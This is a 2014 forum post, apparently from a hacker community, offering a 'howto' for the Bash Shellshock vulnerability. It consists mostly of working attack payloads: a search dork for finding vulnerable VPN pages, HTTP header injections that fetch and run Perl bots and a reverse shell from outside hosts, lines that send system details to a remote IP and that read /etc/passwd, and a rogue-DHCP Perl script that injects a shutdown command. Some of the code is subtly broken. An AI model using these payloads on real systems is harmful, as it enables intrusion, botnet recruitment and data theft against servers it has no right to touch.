April 24, 2017, 05:51:37 PM
Welcome, Guest. Please login or register.

If you are not part of the solution...You are part of the precipitate.

Author Topic: BASH SHELLSHOCK INFO :P ( Howto)  (Read 3744 times)

Offline AnakinSkywalker

  • Prospect
  • *
  • Posts: 27
  • Internets: +7/-9
    • Linux User Group
BASH SHELLSHOCK INFO :P ( Howto)
« on: September 30, 2014, 10:39:34 PM »
Bash ShellShock: Info (HOWTO)
1.)Vulnerable:
XMPP(ejabberd), Mailman, MySQL, NFS, Bind9, Procmail, Exim

2.)Google dork search: (Affecting VPN SSL)
Google Search inurl:inurl:/dana-na/auth/url_default/welcome.cgi

3.) Source
() { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a;
() { :;}; echo 'Shellshock: Vulnerable'
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit

() { :;}; /bin/bash -c "echo testing[number]"; /bin/uname -a\x0a\x0a

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 \x22() { test;};echo \x5C\x22Co\
ntent-type: text/plain\x5C\x22; echo; echo; /bin/cat /etc/passwd\x22 http://[IP address]/cgi-bin/test.cgi

) { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22

 

4.) Bots using the shellshock vulnerability:

This one installs a simple perl bot. Connects to irc.hacker-newbie.org port 6667 channel #bug

() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b\
0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0\
b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http\
://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;" "() { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/sh\
ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.\
com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:\
//xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt')\x22;

5.) Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

6.) Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

7.) Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*\
aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"
Cookie: () { :; }; wget -qO- 82.221.99.235 -U="$(uname -a)"

8.) User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*

Testing for exploit:
+env X='() { :; }; echo " vulnerable"' bash -c id

will create a file named echo in cwd with date in it, if vulnerable
env X='() { (a)=>\' bash -c "echo date"; cat echo

(Third exploit test)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo " vulnerable, redir_stack"

(Forth exploit test)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

(A simple perl script to test host for the exploit bug)

#!/usr/bin/perl
# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]
 
use strict;
 
use IO::Socket;
use Net::DHCP::Packet;
use Net::DHCP::Constants;
 
my $server_ip = "10.10.10.1";
my $client_ip = "10.10.10.10";
my $subnet_mask = "255.255.255.0";
 
my $socket_in = IO::Socket::INET->new( LocalPort => 67, LocalAddr => "255.255.255.255", Proto => 'udp') or die $@;
 
while(1) {
  my $buf;
  $socket_in->recv($buf,4096);
  my $packet = new Net::DHCP::Packet($buf);
  my $messagetype = $packet->getOptionValue(DHO_DHCP_MESSAGE_TYPE());
  if ($messagetype eq DHCPDISCOVER()) {
                  send_offer($packet);
  } elsif ($messagetype eq DHCPREQUEST()) {
                  send_ack($packet);
  }
}
 
sub send_offer {
  my $request = @_;
  my $socket_out = IO::Socket::INET->new( PeerPort => 68, PeerAddr => "255.255.255.255", LocalAddr => "$server_ip:67", Broadcast => 1, Proto => 'udp') or die $@;
  my $offer = new Net::DHCP::Packet(Op => BOOTREPLY(), Xid => $request->xid(), Flags => $request->flags(), Ciaddr => $request->ciaddr(), Yiaddr => $client_ip, Siaddr => $server_ip, Giaddr => $request->giaddr(), Chaddr => $request->chaddr(), DHO_DHCP_MESSAGE_TYPE() => DHCPOFFER())           
$offer->addOptionValue(DHO_SUBNET_MASK(), $subnet_mask);
$offer->addOptionValue(DHO_NAME_SERVERS, $server_ip);
$offer->addOptionValue(DHO_HOST_NAME, "() { :; }; shutdown");
 $offer->addOptionValue(DHO_DOMAIN_NAME, "() { :; }; shutdown");
  $socket_out->send($offer->serialize()) or die $!;
  print STDERR "sent offer\n";
}
 
sub send_ack {
  print STDERR "send ack\n";
}
" Laughing at your network security "  (LulzSec)
*Knowledge is POWER, which is in the hands of the beholder*

* https://www.facebook.com/groups/anon.universal/ *
* https://www.facebook.com/LinuxUserGroup *
* https://twitter.com/Anon_Universal *